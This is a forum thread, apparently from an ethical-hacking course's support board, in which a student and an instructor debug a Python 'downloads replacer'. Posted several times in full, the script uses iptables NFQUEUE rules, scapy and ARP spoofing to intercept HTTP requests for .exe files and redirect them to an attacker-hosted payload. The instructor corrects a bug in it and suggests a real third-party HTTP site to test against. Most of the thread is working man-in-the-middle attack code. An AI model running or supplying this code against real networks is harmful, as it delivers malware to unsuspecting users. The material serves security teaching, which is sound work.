- This topic has 16 replies, 2 voices, and was last updated 4 years, 5 months ago by
.
- Posts
Good afternoon,
I’ve just completed the section for the downloads re-placer however when I run the programme it Isn’t doing anything. I’ve checked my code and compared it to yours and it seems okay. I’ve ran the iptables command and the echo command but nothing happens. I’ve tried it on the local machine and on a windows VM but no success.I am running the ARP spoofer in the background, as well as Apache server.
any help would be greatly appreciated.
Hi Alastair!
First it has to work in local host.
Can you share your code please? And the iptables rules used in this case?Thanks!
Diegohello Diego, here is my code. i used the output and input rules for local machine and the forward rule for the windows vm
#!/usr/bin/env python
# run >> iptables -I FORWARD -j NFQUEUE –queue-num 0
# run >> iptables -I OUTPUT -j NFQUEUE –queue-num 0
# run >> iptables -I INPUT -j NFQUEUE –queue-num 0
# reset with >> iptables –flushimport netfilterqueue
import scapy.all as scapyack_list = []
def set_load(packet, load):
packet[scapy.Raw].load = load
del packet[scapy.IP].len
del packet[scapy.IP].chksum
del packet[scapy.TCP].chksum
return packetdef process_packet(packet):
scapy_packet = scapy.IP(packet.get_payload())
if scapy_packet.haslayer(scapy.Raw):
if scapy_packet[scapy.TCP].dport == 80:
if “.exe” in scapy_packet[scapy.Raw].load:
print(“[+] exe Request”)
ack_list.append(scapy_packet[scapy.TCP].ack)
elif scapy_packet[scapy.TCP].sport == 80:
if scapy_packet[scapy.TCP].seq in ack_list:
ack_list.remove(scapy[scapy.TCP].seq)
print(“[+] Replacing file”)
modified_packet = set_load(scapy_packet, “HTTP/1.1 301 Moved Permanently\nLocation: http://10.0.2.4/Evil-files/today.exe\n\n”)packet.set_payload(str(modified_packet))
packet.accept()
queue = netfilterqueue.NetfilterQueue()
queue.bind(0, process_packet)
queue.run()Hi!
Thanks, but can you share it using identation? Use the CODE buttonFor testing locally which sites are you using?
Let me know.
Diegoapologies, hope this is better. I was using bing.com via firefox
`#!/usr/bin/env python
# run >> iptables -I FORWARD -j NFQUEUE –queue-num 0
# run >> iptables -I OUTPUT -j NFQUEUE –queue-num 0
# run >> iptables -I INPUT -j NFQUEUE –queue-num 0
# reset with >> iptables –flushimport netfilterqueue
import scapy.all as scapyack_list = []
def set_load(packet, load):
packet[scapy.Raw].load = load
del packet[scapy.IP].len
del packet[scapy.IP].chksum
del packet[scapy.TCP].chksum
return packetdef process_packet(packet):
scapy_packet = scapy.IP(packet.get_payload())
if scapy_packet.haslayer(scapy.Raw):
if scapy_packet[scapy.TCP].dport == 80:
if “.exe” in scapy_packet[scapy.Raw].load:
print(“[+] exe Request”)
ack_list.append(scapy_packet[scapy.TCP].ack)
elif scapy_packet[scapy.TCP].sport == 80:
if scapy_packet[scapy.TCP].seq in ack_list:
ack_list.remove(scapy[scapy.TCP].seq)
print(“[+] Replacing file”)
modified_packet = set_load(scapy_packet, “HTTP/1.1 301 Moved Permanently\nLocation: http://10.0.2.4/Evil-files/today.exe\n\n”)packet.set_payload(str(modified_packet))
packet.accept()
queue = netfilterqueue.NetfilterQueue()
queue.bind(0, process_packet)
queue.run()Hi!
As you can see you shared again with out identation, once you’ve pasted yous code select it and click th CODE button.And for your testing sites please use a different one, a http site cause,first, Bing uses hsts protection and second Bing doesn’t provided any .exe to download from it. So please use a http site where you can download an .exe file.
Later on the course you’ll learn to bypass https protection.Let me know how it goes!
Diego3rd time lucky. sorry i was getting muddled, my code injector programme isnt responding either and i used bing for that one. i have tried the downloads replacer on winzip
#!/usr/bin/env python # run >> iptables -I FORWARD -j NFQUEUE --queue-num 0 # run >> iptables -I OUTPUT -j NFQUEUE --queue-num 0 # run >> iptables -I INPUT -j NFQUEUE --queue-num 0 # reset with >> iptables --flush import netfilterqueue import scapy.all as scapy ack_list = [] def set_load(packet, load): packet[scapy.Raw].load = load del packet[scapy.IP].len del packet[scapy.IP].chksum del packet[scapy.TCP].chksum return packet def process_packet(packet): scapy_packet = scapy.IP(packet.get_payload()) if scapy_packet.haslayer(scapy.Raw): if scapy_packet[scapy.TCP].dport == 80: if ".exe" in scapy_packet[scapy.Raw].load: print("[+] exe Request") ack_list.append(scapy_packet[scapy.TCP].ack) elif scapy_packet[scapy.TCP].sport == 80: if scapy_packet[scapy.TCP].seq in ack_list: ack_list.remove(scapy[scapy.TCP].seq) print("[+] Replacing file") modified_packet = set_load(scapy_packet, "HTTP/1.1 301 Moved Permanently\nLocation: http://10.0.2.4/Evil-files/today.exe\n\n") packet.set_payload(str(modified_packet)) packet.accept() queue = netfilterqueue.NetfilterQueue() queue.bind(0, process_packet) queue.run()If this help i get this error when i try and run the programme:
Exception IndexError: IndexError(‘Layer [TCP] not found’,) in ‘netfilterqueue.global_callback’ ignored
Hi!
Thanks! Your code looks ok.Is the same case for winzip, it is a https site, please try it with:
http://www.diabeticretinopathy.org.uk/exeforlaptops.html
It’s not like the most fancy site but it works for testing.
Let me know how it goes!
Diegogood morning,
unfortunately running it against the suggested website had no effect. once i run the two commands for iptables (input,output) and then run the downloads replacer via python my screen just fills up with repeated error maessages:
Exception IndexError: IndexError(‘Layer [TCP] not found’,) in ‘netfilterqueue.global_callback’ ignored
Exception IndexError: IndexError(‘Layer [TCP] not found’,) in ‘netfilterqueue.global_callback’ ignoredI also lose internet connection, i have run the echo 1 …. command but this has no effect
Hi Alastair!
I’ve checked your code once again and I found an error, in line:
ack_list.remove(scapy[scapy.TCP].seq)
You are missing the proper name of the packet which is scapy_packet, so it should be like:
ack_list.remove(scapy_packet[scapy.TCP].seq)
Change it and let me know how it goes!
Diegohello Diego,
I’ve corrected the code however it still runs with the same error as before:
Exception IndexError: IndexError(‘Layer [TCP] not found’,) in ‘netfilterqueue.global_callback’ ignored
I’ve also noticed that when i run :
iptables -I OUTPUT -j NFQUEUE –queue-num 0
iptables -I INPUT -j NFQUEUE –queue-num 0I lose my internet connection and nothing loads
Hi!
Yeah, that’s normal (lossing internet) cause all the packets are being sent to queue 0 and if there’s no script using it they won’t be redirected properly, just flush iptables when you’re done.Can you share your corrected code again? Also share a screenshot of the error? I want to see where is it exactly ocurring based on the prints you have in your code.
Let me know.
Diegohello Diego,
#!/usr/bin/env python # run >> iptables -I FORWARD -j NFQUEUE --queue-num 0 # run >> iptables -I OUTPUT -j NFQUEUE --queue-num 0 # run >> iptables -I INPUT -j NFQUEUE --queue-num 0 # reset with >> iptables --flush import netfilterqueue import scapy.all as scapy ack_list = [] def set_load(packet, load): packet[scapy.Raw].load = load del packet[scapy.IP].len del packet[scapy.IP].chksum del packet[scapy.TCP].chksum return packet def process_packet(packet): scapy_packet = scapy.IP(packet.get_payload()) if scapy_packet.haslayer(scapy.Raw): if scapy_packet[scapy.TCP].dport == 80: if ".exe" in scapy_packet[scapy.Raw].load: print("[+] exe Request") ack_list.append(scapy_packet[scapy.TCP].ack) elif scapy_packet[scapy.TCP].sport == 80: if scapy_packet[scapy.TCP].seq in ack_list: ack_list.remove(scapy_packet[scapy.TCP].seq) print("[+] Replacing file") modified_packet = set_load(scapy_packet, "HTTP/1.1 301 Moved Permanently\nLocation: http://192.168.1.46/Files/Payload.exe\n\n") packet.set_payload(str(modified_packet)) packet.accept() queue = netfilterqueue.NetfilterQueue() queue.bind(0, process_packet) queue.run()link to screenshot:
https://1drv.ms/u/s!Amebr6-UtXCwjD4SQTE2wZsrwdwv
thanks
- You must be logged in to reply to this topic.
